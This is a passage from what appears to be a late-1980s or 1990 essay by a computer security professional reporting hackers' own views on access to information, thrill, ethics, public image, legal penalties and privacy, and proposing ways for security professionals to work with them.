  652. a small part of that.  Hacking is also about freedom of speech and
  653. free access to information -- being able to find out anything.  There
  654. is also the David and Goliath side of it, the underdog vs. the system,
  655. and the ethic of being a folk hero, albeit a minor one.''
  656.  
  657. Richard Stallman, founder of the Free Software Foundation who calls
  658. himself a hacker according to the first sense of the word above,
  659. recommends calling security-breaking hackers ``crackers''
  660. (Stallman84).  While this description may be more accurate, I shall
  661. use the term ``hacker'' since the people I am writing about call
  662. themselves hackers and all are interested in learning about computer
  663. and communication systems.  However, there are many people like
  664. Stallman who call themselves hackers and do not engage in illegal
  665. or deceptive practices; this paper is also not about those hackers.
  666.  
  667. In what follows I will report on what I have learned about hackers
  668. from hackers.  I will organize the discussion around the principal
  669. domains of concerns I observed.  I recommend Meyer's thesis (Meyer89)
  670. for a more detailed treatment of the hackers' social culture and
  671. networks, and Meyer and Thomas (MeyerThomas90) for an interesting
  672. interpretation of the computer underground as a postmodernist rejection
  673. of conventional culture that substitutes ``rational technological
  674. control of the present for an anarchic and playful future.''
  675.  
  676. I do not pretend to know all the concerns that hackers have, nor
  677. do I claim to have conducted a scientific study.  Rather, I hope
  678. that my own informal study motivates others to explore the area
  679. further.  It is essential that we as computer security professionals
  680. take into account hackers' concerns in the design of our policies,
  681. procedures, laws regulating computer and information access, and
  682. educational programs.  Although I speak about security-breaking hackers
  683. as a group, their competencies, actions, and views are not all the
  684. same.  Thus, it is equally important that our policies and programs
  685. take into account individual differences.
  686.  
  687. In focusing on what hackers say and do, I do not mean for a moment
  688. to set aside the concerns of the owners and users of systems that
  689. hackers break into, the concerns of law enforcement personnel, or
  690. our own concerns as computer security professionals.  But I do
  691. recommend that we work closely with hackers as well as these other
  692. groups to design new approaches and programs for addressing the
  693. concerns of all.   Like ham radio operators, hackers exist, and it
  694. is in our best interest that we learn to communicate and work with
  695. them rather than against them.
  696.  
  697. I will suggest some actions that we might consider taking, and I
  698. invite others to reflect on these and suggest their own.  Many of
  699. these suggestions are from the hackers themselves; others came from
  700. the recommendations of the ACM Panel on Hacking (Lee86) and from
  701. colleagues.
  702.  
  703. I grouped the hackers' concerns into five categories: access to
  704. computers and information for learning; thrill, excitement and
  705. challenge; ethics and avoiding damage; public image and treatment;
  706. and privacy and first amendment rights.  These are discussed in
  707. the next five subsections.  I have made an effort to present my
  708. findings as uncritical observations.  The reader should not infer
  709. that I either approve or disapprove of actions hackers take.
  710.  
  711.  
  712. 3.  Access to Computers and Information for Learning
  713.  
  714. Although Levy's book ``Hackers'' (Levy84) is not about today's
  715. security-breaking hackers, it articulates and interprets a ``hacker
  716. ethic'' that is shared by many of these hackers.  The ethic includes
  717. two key principles that were formulated in the early days of the
  718. AI Lab at MIT: ``Access to computers -- and anything which might
  719. teach you something about the way the world works -- should be
  720. unlimited and total,'' and ``All information should be free.''  In
  721. the context in which these principles were formulated, the computers
  722. of interest were research machines and the information was software
  723. and systems information.
  724.  
  725. Since Stallman is a leading advocate of open systems and freedom
  726. of information, especially software, I asked him what he means by
  727. this.  He said: ``I believe that all generally useful information
  728. should be free. By `free' I am not referring to price, but rather
  729. to the freedom to copy the information and to adapt it to one's own
  730. uses.''  By ``generally useful'' he does not include confidential
  731. information about individuals or credit card information, for example.
  732. He further writes: ``When information is generally useful,
  733. redistributing it makes humanity wealthier no matter who is
  734. distributing and no matter who is receiving.''  Stallman has argued
  735. strongly against user interface copyright, claiming that it does
  736. not serve the users or promote the evolutionary process (Stallman90).
  737.  
  738. I asked hackers whether all systems should be accessible and all
  739. information should be free.  They said that it is OK if some systems
  740. are closed and some information, mainly confidential information
  741. about individuals, is not accessible.  They make a distinction between
  742. information about security technology, e.g., the DES, and confidential
  743. information protected by that technology, arguing that it is the
  744. former that should be accessible.   They said that information hoarding
  745. is inefficient and slows down evolution of technology.  They also
  746. said that more systems should be open so that idle resources are
  747. not wasted.  One hacker said that the high costs of communication
  748. hurts the growth of the information economy.
  749.  
  750. These views of information sharing seem to go back at least as far
  751. as the 17th and 18th centuries.  Samuelson (Samuelson89) notes that
  752. ``The drafters of the Constitution, educated in the Enlightenment
  753. tradition, shared that era's legacy of faith in the enabling powers
  754. of knowledge for society as well as the individual.''  She writes
  755. that our current copyright laws, which protect the expression of
  756. information, but not the information itself, are based on the belief
  757. that unfettered and widespread dissemination of information promotes
  758. technological progress. (Similarly for patent laws which protect
  759. devices and processes, not the information about them.)  She cites
  760. two recent court cases where courts reversed the historical trend
  761. and treated information as ownable property.  She raises questions
  762. about whether in entering the Information Age where information is
  763. the source of greatest wealth, we have outgrown the Enlightenment
  764. tradition and are coming to treat information as property.
  765.  
  766. In a society where knowledge is said to be power, Drake expressed
  767. particular concern about what he sees as a growing information gap
  768. between the rich and poor.  He would like to see information that
  769. is not about individuals be made public, although it could still
  770. be owned.  He likes to think that companies would actually find it
  771. to their advantage to share information.  He noted how IBM's disclosure
  772. of the PC allowed developers to make more products for the computers,
  773. and how Adobe's disclosure of their fonts helped them compete against
  774. the Apple-Microsoft deal.  He recognizes that in our current political
  775. framework, it is difficult to make all information public, because
  776. complicated structures have been built on top of an assumption that
  777. certain information will be kept secret.  He cites our defense policy,
  778. which is founded on secrecy for military information, as an example.
  779.  
  780. Hackers say they want access to information and computing and network
  781. resources in order to learn.  Both Levy (Levy84) and Landreth
  782. (Landreth89) note that hackers have an intense, compelling interest
  783. in computers and learning, and many go into computers as a profession.
  784. Some hackers break into systems in order to learn more about how
  785. the systems work.  Landreth says these hackers want to remain
  786. undiscovered so that they can stay on the system as long as possible.
  787. Some of them devote most of their time to learning how to break the
  788. locks and other security mechanisms on systems; their background
  789. in systems and programming varies considerably.  One hacker wrote
  790. ``A hacker sees a security hole and takes advantage of it because
  791. it is there, not to destroy information or steal.  I think our
  792. activities would be analogous to someone discovering methods of
  793. acquiring information in a library and becoming excited and perhaps
  794. engrossed.''
  795.  
  796. We should not underestimate the effectiveness of the networks in
  797. which hackers learn their craft.  They do research, learn about
  798. systems, work in groups, write, and teach others.  One hacker said
  799. that he belongs to a study group with the mission of churning out
  800. files of information and learning as much as possible.  Within the
  801. group, people specialize, collaborate on research projects, share
  802. information and news, write articles, and teach others about their
  803. areas of specialization.  Hackers have set up a private system of
  804. education that engages them, teaches them to think, and allows them
  805. to apply their knowledge in purposeful, if not always legal,
  806. activity.   Ironically, many of our nation's classrooms have been
  807. criticized for providing a poor learning environment that seems to
  808. emphasize memorization rather than thinking and reasoning.  One hacker
  809. reported that through volunteer work with a local high school, he
  810. was trying to get students turned on to learning.
  811.  
  812. Many hackers say that the legitimate computer access they have through
  813. their home and school computers do not meet their needs.  One student
  814. told me that his high school did not offer anything beyond elementary
  815. courses in BASIC and PASCAL, and that he was bored by these.  Hans
  816. Huebner, a hacker in Germany who goes by the name Pengo, wrote in
  817. a note to the RISKS Forum (Huebner89) : ``I was just interested in
  818. computers, not in the data which has been kept on their disks. As
  819. I was going to school at that time, I didn't even have the money
  820. to buy my own computer.  Since CP/M (which was the most sophisticated
  821. OS I could use on machines which I had legal access to) didn't turn
  822. me on anymore, I enjoyed the lax security of the systems I had access
  823. to by using X.25 networks.  You might point out that I should have
  824. been patient and waited until I could go to the university and
  825. use their machines.  Some of you might understand that waiting was
  826. just not the thing I was keen on in those days.''
  827.  
  828. Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
  829. Hacking, claims that the computer medium available to students, e.g.,
  830. BASIC and floppy disks, is inadequate for challenging intellectual
  831. work.  His recommendation is that students be given access to real
  832. computing power, and that they be taught how to use that power
  833. responsibly.  He describes a program he created at a public high school
  834. in Massachusetts during the period 1979-1982.  They installed a
  835. PDP-11/70 and let students and teachers carry out the administration
  836. of the system.  Harvey assessed that putting the burden of dealing
  837. with the problems of malicious users on the students themselves was
  838. a powerful educational force.  He also noted that the students who
  839. had the skill and interest to be password hackers were discouraged
  840. from this activity because they also wanted to keep the trust of
  841. their colleagues in order that they could acquire ``superuser'' status
  842. on the system.
  843.  
  844. Harvey also makes an interesting analogy between teaching computing
  845. and teaching karate.  In karate instruction, students are introduced
  846. to the real, adult community.  They are given access to a powerful,
  847. deadly weapon, and at the same time are taught discipline and
  848. responsibility.  Harvey speculates that the reason that students
  849. do not misuse their power is that they know they are being trusted
  850. with something important, and they want to live up to that trust.
  851. Harvey applied this principle when he set up the school system.
  852.  
  853. The ACM panel endorsed Harvey's recommendation, proposing a
  854. three-tiered computing environment with local, district-wide, and
  855. nation-wide networks.  They recommended that computer professionals
  856. participate in this effort as mentors and role models.   They also
  857. recommended that government and industry be encouraged to establish
  858. regional computing centers using donated or re-cycled equipment;
  859. that students be apprenticed to local companies either part-time
  860. on a continuing basis or on a periodic basis; and, following a
  861. suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
  862. that a league analogous to the Amateur Radio Relay League be
  863. established to make contributed resources available for educational
  864. purposes.
  865.  
  866. Drake said he liked these recommendations.  He said that if hackers
  867. were given access to powerful systems through a public account system,
  868. they would supervise themselves.  He also suggested that Computer
  869. Resource Centers be established in low-income areas in order to help
  870. the poor get access to information.  Perhaps hackers could help run
  871. the centers and teach the members of the community how to use the
  872. facilities.  One of my colleagues suggested cynically that the hackers
  873. would only use this to teach the poor how to hack rich people's
  874. systems.  A hacker responded by saying this was ridiculous; hackers
  875. would not teach people how to break into systems, but rather how
  876. to use computers effectively and not be afraid of them.
  877. In addition, the hackers I spoke with who had given up illegal
  878. activities said they stopped doing so when they got engaged in other
  879. work.
  880.  
  881. Geoff Goodfellow and Richard Stallman have reported that they have
  882. given hackers accounts on systems that they manage, and that the
  883. hackers have not misused the trust granted to them.  Perhaps
  884. universities could consider providing accounts to pre-college students
  885. on the basis of recommendations from their teachers or parents.
  886. The students might be challenged to work on the same homework problems
  887. assigned in courses or to explore their own interests.  Students
  888. who strongly dislike the inflexibility of classroom learning might
  889. excel in an environment that allows them to learn on their own, in
  890. much the way that hackers have done.
  891.  
  892. 4.  Thrill, Excitement, and Challenge
  893.  
  894.  
  895. One hacker wrote that ``Hackers understand something basic about
  896. computers, and that is that they can be enjoyed.  I know none who
  897. hack for money, or hack to frighten the company, or hack for anything
  898. but fun.''
  899.  
  900. In the words of another hacker, ``Hacking was the ultimate cerebral
  901. buzz for me.  I would come home from another dull day at school,
  902. turn my computer on, and become a member of the hacker elite.  It
  903. was a whole different world where there were no condescending adults
  904. and you were judged only by your talent.  I would first check in
  905. to the private Bulletin Boards where other people who were like me
  906. would hang out, see what the news was in the community, and trade
  907. some info with people across the country.  Then I would start actually
  908. hacking.  My brain would be going a million miles an hour and I'd
  909. basically completely forget about my body as I would jump from one
  910. computer to another trying to find a path into my target.  It was
  911. the rush of working on a puzzle coupled with the high of discovery
  912. many magnitudes intensified.  To go along with the adrenaline rush
  913. was the illicit thrill of doing something illegal. Every step I made
  914. could be the one that would bring the authorities crashing down on
  915. me.  I was on the edge of technology and exploring past it, spelunking
  916. into electronic caves where I wasn't supposed to be.''
  917.  
  918. The other hackers I spoke with made similar statements about the
  919. fun and challenge of hacking.  In SPIN magazine (Dibbel90), reporter
  920. Julian Dibbell speculated that much of the thrill comes from the
  921. dangers associated with the activity, writing that ``the technology
  922. just lends itself to cloak-and-dagger drama,'' and that ``hackers
  923. were already living in a world in which covert action was nothing
  924. more than a game children played.''
  925.  
  926. Eric Corley (Corley89) characterizes hacking as an evolved form of
  927. mountain climbing.  In describing an effort to construct a list of
  928. active mailboxes on a Voice Messaging System, he writes ``I suppose
  929. the main reason I'm wasting my time pushing all these buttons is
  930. simply so that I can make a list of something that I'm not supposed
  931. to have and be the first person to accomplish this.''  He said that
  932. he was not interested in obtaining an account of his own on the system.
  933. Gordon Meyer says he found this to be a recurring theme: ``We aren't
  934. supposed to be able to do this, but we can'' -- so they do.
  935.  
  936. One hacker said he was now working on anti-viral programming.  He
  937. said it was almost as much fun as breaking into systems, and that
  938. it was an intellectual battle against the virus author.
  939.  
  940.  
  941. 5.  Ethics and Avoiding Damage
  942.  
  943.  
  944. All of the hackers I spoke with said that malicious hacking was morally
  945. wrong.  They said that most hackers are not intentionally malicious,
  946. and that they themselves are concerned about causing accidental
  947. damage.  When I asked Drake about the responsibility of a person
  948. with a PC and modem, his reply included not erasing or modifying
  949. anyone else's data, and not causing a legitimate user on a system
  950. any problems.  Hackers say they are outraged when other hackers cause
  951. damage or use resources that would be missed, even if the results
  952. are unintentional and due to incompetence.  One hacker wrote ``I
  953. have ALWAYS strived to do NO damage, and to inconvenience as few people
  954. as possible.  I NEVER, EVER, EVER DELETE A FILE.  One of the first
  955. commands I do on a new system is disable the delete file command.''
  956. Some hackers say that it is unethical to give passwords and similar
  957. security-related information to persons who might do damage.  In
  958. the recent incident where a hacker broke into Bell South and downloaded
  959. a text file on the emergency 911 service, hackers say that there
  960. was no intention to use this knowledge to break into or sabotage
  961. the 911 system.  According to Emmanuel Goldstein (Goldstein90), the
  962. file did not even contain information about how to break into the
  963. 911 system.
  964.  
  965. The hackers also said that some break-ins were unethical, e.g.,
  966. breaking into hospital systems, and that it is wrong to read
  967. confidential information about individuals or steal classified
  968. information.  All said it was wrong to commit fraud for personal
  969. profit.
  970.  
  971. Although we as computer security professionals often disagree with
  972. hackers about what constitutes damage, the ethical standards listed
  973. here sound much like our own.  Where the hackers' ethics differ from
  974. the standards adopted by most in the computer security community
  975. is that hackers say it is not unethical to break into many systems,
  976. use idle computer and communications resources, and download system
  977. files in order to learn.  Goldstein says that hacking is not wrong:
  978. it is not the same as stealing, and uncovers design flaws and security
  979. deficiencies (Goldstein89).
  980.  
  981. Brian Reid, a colleague at Digital who has spoken with many hackers,
  982. speculates that a hacker's ethics may come from not being raised
  983. properly as a civilized member of society, and not appreciating the
  984. rules of living in society.  One hacker responded to this with ``What
  985. does `being brought up properly' mean?  Some would say that it is
  986. `good' to keep to yourself, mind your own business.  Others might
  987. argue that it is healthy to explore, take risks, be curious and
  988. discover.'' Brian Harvey (Harvey86) notes that many hackers are
  989. adolescents, and that adolescents are at a less advanced stage of
  990. moral development than adults, where they might not see how the effects
  991. of their actions hurt others.  Larry Martin (Martin89) claims that
  992. parents, teachers, the press, and others in society are not aware
  993. of their responsibility to contribute to instilling ethical values
  994. associated with computer use.  This could be the consequence of the
  995. youth of the computing field; many people are still computer illiterate
  996. and cultural norms may be lagging behind advances in technology and
  997. the growing dependency on that technology by businesses and society.
  998. Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
  999. the cultural normative messages about the use and abuse of computer
  1000. technology have been driven by the adoption of criminal laws in the
  1001. last decade.  They also speculate that hacking may be encouraged
  1002. during the process of becoming computer literate.  Some of my
  1003. colleagues say that hackers are irresponsible.  One hacker responded
  1004. ``I think it's a strong indication of the amount of responsibility
  1005. shown that so FEW actually DAMAGING incidents are known.''
  1006.  
  1007. But we must not overlook that the differences in ethics also reflect
  1008. a difference in philosophy about information and information handling
  1009. resources; whereas hackers advocate sharing, we seem to be advocating
  1010. ownership as property.  The differences also represent an opportunity
  1011. to examine our own ethical behavior and our practices for information
  1012. sharing and protection.  For example, one hacker wrote ``I will accept
  1013. that it is morally wrong to copy some proprietary software, however,
  1014. I think that it is morally wrong to charge $6000 for a program that
  1015. is only around 25K long.''  Hence, I shall go into a few of the ethical
  1016. points raised by hackers more closely.  It is not a simple case of
  1017. good or mature (us) against bad or immature (hackers), or of teaching
  1018. hackers a list of rules.
  1019.  
  1020. Many computer professionals such as Martin (Martin89) argue the moral
  1021. questions by analogy.  The analogies are then used to justify their
  1022. judgment of a hacker's actions as unethical.  Breaking into a system
  1023. is compared with breaking into a house, and downloading information
  1024. and using computer and telecommunications services is compared with
  1025. stealing tangible goods.  But, say hackers, the situations are not
  1026. the same.  When someone breaks into a house, the objective is to
  1027. steal goods, which are often irreplaceable, and property is often
  1028. damaged in the process.  By contrast, when a hacker breaks into a
  1029. system, the objective is to learn and avoid causing damage.  Downloaded
  1030. information is copied, not stolen, and still exists on the original
  1031. system.  Moreover, as noted earlier, information has not been
  1032. traditionally regarded as property.  Dibbel (Dibbel90) says that
  1033. when the software industries and phone companies claim losses of
  1034. billions of dollars to piracy, they are not talking about goods that
  1035. disappear from the shelves and could have been sold.
  1036.  
  1037. We often say that breaking into a system implies a lack of caring
  1038. for the system's owner and authorized users.  But, one hacker says
  1039. that the ease of breaking into a system reveals a lack of caring
  1040. on the part of the system manager to protect user and company assets,
  1041. or failure on the part of vendors to warn managers about the
  1042. vulnerabilities of their systems.  He estimated his success rate
  1043. of getting in at 10-15%, and that is without spending more than an
  1044. hour on any one target system.  Another hacker says that he sees
  1045. messages from vendors notifying the managers, but that the managers
  1046. fail to take action.
  1047.  
  1048. Richard Pethia of CERT (Computer Emergency Response Team) reports
  1049. that they seldom see cases of malicious damage caused by hackers,
  1050. but that the break-ins are nevertheless disruptive because system
  1051. users and administrators want to be sure that nothing was damaged.
  1052. (CERT suggests that sites reload system software from secure backups
  1053. and change all user passwords in order to protect against possible
  1054. back doors and Trojan Horses that might have been planted by the
  1055. hacker.  Pethia also noted that prosecutors are generally called
  1056. for government sites, and are being called for non-government sites
  1057. with increasing frequency.)  Pethia says that break-ins also generate
  1058. a loss of trust in the computing environment, and may lead to adoption
  1059. of new policies that are formulated in a panic or management edicts
  1060. that severely restrict connectivity to outside systems.   Brian Harvey
  1061. says that hackers cause damage by increasing the amount of paranoia,
  1062. which in turn leads to tighter security controls that diminish the
  1063. quality of life for the users.  Hackers respond to these points by
  1064. saying they are the scapegoats for systems that are not adequately
  1065. protected.  They say that the paranoia is generated by ill-founded
  1066. fears and media distortions (I will return to this point later),
  1067. and that security need not be oppressive to keep hackers out; it
  1068. is mainly making sure that passwords and system defaults are
  1069. well chosen.
  1070.  
  1071. Pethia says that some intruders seem to be disruptive to prove a
  1072. point, such as that the systems are vulnerable, the security personnel
  1073. are incompetent, or ``it's not nice to say bad things about hackers.''
  1074. In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
  1075. who claimed to have broken into Cliff Stoll's system said he was
  1076. upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
  1077. (Stoll90).   Markoff reported that the caller said: ``He (Stoll)
  1078. was going on about how he hates all hackers, and he gave pretty much
  1079. of a one-sided view of who hackers are.''
  1080.  
  1081. ``The Cuckoo's Egg'' captures many of the popular stereotypes of
  1082. hackers.  Criminologist Jim Thomas criticizes it for presenting a
  1083. simplified view of the world, one where everything springs from the
  1084. forces of light (us) or of darkness (hackers) (Thomas90).  He claims
  1085. that Stoll fails to see the similarities between his own activities
  1086. (e.g., monitoring communications, ``borrowing'' monitors without
  1087. authorization, shutting off network access without warning, and lying
  1088. to get information he wants) and those of hackers.  He points out
  1089. Stoll's use of pejorative words such as ``varmint'' to describe
  1090. hackers, and Stoll's quote of a colleague: ``They're technically
  1091. skilled but ethically bankrupt programmers without any respect for
  1092. others' work -- or privacy.  They're not destroying one or two
  1093. programs.  They're trying to wreck the cooperation that builds our
  1094. networks,'' (Stoll90, p. 159).  Thomas writes ``at an intellectual
  1095. level, it (Stoll's book) provides a persuasive, but simplistic, moral
  1096. imagery of the nature of right and wrong, and provides what -- to
  1097. a lay reader -- would seem a compelling justification for more statutes
  1098. and severe penalties against the computer underground.  This is
  1099. troublesome for two reasons.  First, it leads to a mentality of social
  1100. control by law enforcement during a social phase when some would
  1101. argue we are already over-controlled.  Second, it invokes a punishment
  1102. model that assumes we can stamp out behaviors to which we object
  1103. if only we apprehend and convict a sufficient number of violators.
  1104. ...  There is little evidence that punishment will in the long run
  1105. reduce any given offense, and the research of Gordon Meyer and I
  1106. suggests that criminalization may, in fact, contribute to the growth
  1107. of the computer underground.''
  1108.  
  1109.  
  1110. 6. Public Image and Treatment
  1111.  
  1112.  
  1113. Hackers express concern about their negative public image and
  1114. identity.  As noted earlier, hackers are often portrayed as being
  1115. irresponsible and immoral.  One hacker said that ``government
  1116. propaganda is spreading an image of our being at best, sub-human,
  1117. depraved, criminally inclined, morally corrupt, low life.  We need
  1118. to prove that the activities that we are accused of (crashing systems,
  1119. interfering with life support equipment, robbing banks, and jamming
  1120. 911 lines) are as morally abhorrent to us as they are to the general
  1121. public.''
  1122.  
  1123. The public identity of an individual or group is generated in part
  1124. by the actions of the group interacting with the standards of the
  1125. community observing those actions.  What then accounts for the
  1126. difference between the hacker's public image and what they say about
  1127. themselves?  One explanation may be the different standards.  Outside
  1128. the hacking community, the simple act of breaking into systems is
  1129. regarded as unethical by many.  The use of pejorative words like
  1130. ``vandal'' and ``varmint'' reflect this discrepency in ethics.  Even
  1131. the word ``criminal'' carries with it connotations of someone evil;
  1132. hackers say they are not criminal in this sense.  Katie Hafner notes
  1133. that Robert Morris Jr., who was convicted of launching the Internet
  1134. worm, was likened to a terrorist even though the worm did not destroy
  1135. data (Hafner90)
  1136.  
  1137. Distortions of events and references to potential threats also create
  1138. an image of persons who are dangerous.  Regarding the 911 incident
  1139. where a hacker downloaded a file from Bell South, Goldstein reported
  1140. ``Quickly, headlines screamed that hackers had broken into the 911
  1141. system and were interfering with emergency telephone calls to the
  1142. police.  One newspaper report said there were no indications that
  1143. anyone had died or been injured as a result of the intrusions.  What
  1144. a relief.  Too bad it wasn't true,'' (Goldstein90).  In fact, the
  1145. hackers involved with the 911 text file had not broken into the 911
  1146. system.  The dollar losses attributed to hacking incidents also are
  1147. often highly inflated.
  1148.  
  1149. Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
  1150. hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
  1151. wherein a group is first labeled as dangerous, and then enforcement
  1152. agents are mobilized to exorcise the alleged social evil.  They see
  1153. the current sweeps against hackers as part of a reaction to a broader
  1154. fear of change, rather than to the actual crimes committed.
  1155.  
  1156. Hackers say they are particularly concerned that computer security
  1157. professionals and system managers do not appear to understand hackers
  1158. or be interested in their concerns.  Hackers say that system managers
  1159. treat them like enemies and criminals, rather than as potential helpers
  1160. in their task of making their systems secure.  This may reflect
  1161. managers' fears about hackers, as well as their responsibilities
  1162. to protect the information on their systems.  Stallman says that
  1163. the strangers he encounters using his account are more likely to
  1164. have a chip on their shoulder than in the past; he attributes this
  1165. to a harsh enforcer mentality adopted by the establishment.  He says
  1166. that network system managers start out with too little trust and
  1167. a hostile attitude toward strangers that few of the strangers deserve.
  1168. One hacker said that system managers show a lack of openness to those
  1169. who want to learn.
  1170.  
  1171. Stallman also says that the laws make the hacker scared to communicate
  1172. with anyone even slightly ``official,'' because that person might
  1173. try to track the hacker down and have him or her arrested.  Drake
  1174. raised the issue of whether the laws could differentiate between
  1175. malicious and nonmalicious hacking, in support of a ``kinder, gentler''
  1176. relationship between hackers and computer security people.  In fact,
  1177. many states such as California initially passed computer crime laws
  1178. that excluded malicious hacking; it was only later that these laws
  1179. were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
  1180. Hollinger and Lanza-Kaduce speculate that these amendments and other
  1181. new laws were catalyzed mainly by media events, especially the reports
  1182. on the ``414 hackers'' and the movie ``War Games,'' which created
  1183. a perception of hacking as extremely dangerous, even if that perception
  1184. was not based on facts.
  1185.  
  1186. Hackers say they want to help system managers make their systems
  1187. more secure.  They would like managers to recognize and use their
  1188. knowledge about system vulnerabilities.   Landreth (Landreth89)
  1189. suggests ways in which system managers can approach hackers in order
  1190. to turn them into colleagues, and Goodfellow also suggests befriending
  1191. hackers (Goodfellow83).  John Draper (Cap'n Crunch) says it would
  1192. help if system managers and the operators of phone companies and
  1193. switches could cooperate in tracing a hacker without bringing in
  1194. law enforcement authorities.
  1195.  
  1196. Drake suggests giving hackers free access in exchange for helping
  1197. with security, a suggestion that I also heard from several hackers.
  1198. Drake says that the current attitude of treating hackers as enemies
  1199. is not very conducive to a solution, and by belittling them, we only
  1200. cause ourselves problems.
  1201.  
  1202. I asked some of the hackers whether they'd be interested in breaking
  1203. into systems if the rules of the ``game'' were changed so that instead
  1204. of being threatened by prosecution, they were invited to leave a
  1205. ``calling card'' giving their name, phone number, and method of
  1206. breaking in.  In exchange, they would get recognition and points
  1207. for each vulnerability they discovered.  Most were interested in
  1208. playing; one hacker said he would prefer monetary reward since he
  1209. was supporting himself.  Any system manager interested in trying
  1210. this out could post a welcome message inviting hackers to leave their
  1211. cards.  This approach could have the advantage of not only letting
  1212. the hackers contribute to the security of the system, but of allowing
  1213. the managers to quickly recognize the potentially malicious hackers,
  1214. since they are unlikely to leave their cards.  Perhaps if hackers
  1215. are given the opportunity to make contributions outside the
  1216. underground, this will dampen their desire to pursue illegal activities.
  1217.  
  1218. Several hackers said that they would like to be able to pursue their
  1219. activities legally and for income.  They like breaking into systems,
  1220. doing research on computer security, and figuring out how to protect
  1221. against vulnerabilities.  They say they would like to be in a position
  1222. where they have permission to hack systems.  Goodfellow suggests
  1223. hiring hackers to work on tiger teams that are commissioned to locate
  1224. vulnerabilities in systems through penetration testing.  Baird
  1225. Info-Systems Safeguards, Inc., a security consulting firm, reports
  1226. that they have employed hackers on several assignments (Baird87).
  1227. They say the hackers did not violate their trust or the trust of
  1228. their clients, and performed in an outstanding manner.  Baird believes
  1229. that system vulnerabilities can be better identified by employing
  1230. people who have exploited systems.
  1231.  
  1232. One hacker suggested setting up a clearinghouse that would match
  1233. hackers with companies that could use their expertise, while
  1234. maintaining anonymity of the hackers and ensuring confidentiality
  1235. of all records.  Another hacker, in describing an incident where
  1236. he discovered a privileged account without a password, said ``What
  1237. I (and others) wish for is a way that hackers can give information
  1238. like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
  1239. FOR HELPING! As it is, if someone told them that `I'm a hacker, and
  1240. I REALLY think you should know...' they would freak out, and run
  1241. screaming to the SS (Secret Service) or the FBI. Eventually, the
  1242. person who found it would be caught, and hauled away on some crazy
  1243. charge.  If they could only just ACCEPT that the hacker was trying
  1244. to help!''  The clearinghouse could also provide this type of service.
  1245.  
  1246. Hackers are also interested in security policy issues.  Drake expressed
  1247. concern over how we handle information about computer security
  1248. vulnerabilities.  He argues that it is better to make this information
  1249. public than cover it up and pretend that it does not exist, and cites
  1250. the CERT to illustrate how this approach can be workable.  Other
  1251. hackers, however, argue for restricting initial dissemination of
  1252. flaws to customers and users.  Drake also expressed concern about
  1253. the role of the government, particularly the military, in
  1254. cryptography.  He argues that NSA's opinion on a cryptographic standard
  1255. should be taken with a large grain of salt because of their code
  1256. breaking role.
  1257.  
  1258. Some security specialists are opposed to hiring hackers for security
  1259. work, and Eugene Spafford has urged people not to do business with
  1260. any company that hires a convicted hacker to work in the security
  1261. area (ACM90).  He says that ``This is like having a known arsonist
  1262. install a fire alarm.''   But, the laws are such that a person can
  1263. be convicted for having done nothing other than break into a system;
  1264. no serious damage (i.e., no ``computer arson'') is necessary.  Many
  1265. of our colleagues, including Geoff Goodfellow (Goodfellow83) and
  1266. Brian Reid (Frenkel87), admit to having broken into systems in the
  1267. past.  Reid is quoted as saying that because of the knowledge he gained
  1268. breaking into systems as a kid, he was frequently called in to help
  1269. catch people who break in.  Spafford says that times have changed,
  1270. and that this method of entering the field is no longer socially
  1271. acceptable, and fails to provide adequate training in computer science
  1272. and computer engineering (Spafford89).  However, from what I have
  1273. observed, many hackers do have considerable knowledge about
  1274. telecommunications, data security, operating systems, programming
  1275. languages, networks, and cryptography.  But, I am not challenging
  1276. a policy to hire competent people of sound character.  Rather, I
  1277. am challenging a strict policy that uses economic pressure to close
  1278. a field of activity to all persons convicted of breaking into
  1279. systems.   It is enough that a company is responsible for the behavior
  1280. of its employees.  Each hacker can be considered for employment based
  1281. on his or her own competency and character.
  1282.  
  1283. Some people have called for stricter penalties for hackers, including
  1284. prison terms, in order to send a strong deterrent message to hackers.
  1285. John Draper, who was incarcerated for his activities in the 1970's,
  1286. argues that in practice this will only make the problem worse.  He
  1287. told me that he was forced under threat to teach other inmates his
  1288. knowledge of communications systems.  He believes that prison sentences
  1289. will serve only to spread hacker's knowledge to career criminals.
  1290. He said he was never approached by criminals outside the prison,
  1291. but that inside the prison they had control over him.
  1292.  
  1293. One hacker said that by clamping down on the hobbyist underground,
  1294. we will only be left with the criminal underground.  He said that
  1295. without hackers to uncover system vulnerabilities, the holes will
  1296. be left undiscovered, to be utilized by those likely to cause real
  1297. damage.
  1298.  
  1299. Goldstein argues that the existing penalties are already way out
  1300. of proportion to the acts committed, and that the reason is because
  1301. of computers (Goldstein89).  He says that if Kevin Mitnick had
  1302. committed crimes similar to those he committed but without a computer,
  1303. he would have been classified as a mischief maker and maybe fined
  1304. $100 for trespassing; instead, he was put in jail without bail
  1305. (Goldstein89).  Craig Neidorf, a publisher and editor of the electronic
  1306. newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
  1307. for receiving, editing, and transmitting the downloaded text file
  1308. on the 911 system (Goldstein90). (Since the time I wrote this, a new
  1309. indictment was issued with penalties of up to 65 years in prison.
  1310. Neidorf went on trial beginning July 23.  The trial ended July 27
  1311. when the government dropped all charges.  DED)
  1312.  
  1313. 7.  Privacy and the First and Fourth Amendments
  1314.  
  1315. The hackers I spoke with advocated privacy protection for sensitive
  1316. information about individuals.   They said they are not interested
  1317. in invading people's privacy, and that they limited their hacking
  1318. activities to acquiring information about computer systems or how
  1319. to break into them.  There are, of course, hackers who break into
  1320. systems such as the TRW credit database.  Emanuel Goldstein argues
  1321. that such invasions of privacy took place before the hacker arrived
  1322. (Harpers90).  Referring to credit reports, government files, motor
  1323. vehicle records, and the ``megabytes of data piling up about each
  1324. of us,'' he says that thousands of people legally can see and use
  1325. this data, much of it erroneous.  He claims that the public has been
  1326. misinformed about the databases, and that hackers have become
  1327. scapegoats for the holes in the systems.  One hacker questioned the
  1328. practice of storing sensitive personal information on open systems
  1329. with dial-up access, the accrual of the information, the methods
  1330. used to acquire it, and the purposes to which it is put.  Another
  1331. hacker questioned the inclusion of religion and race in credit records.
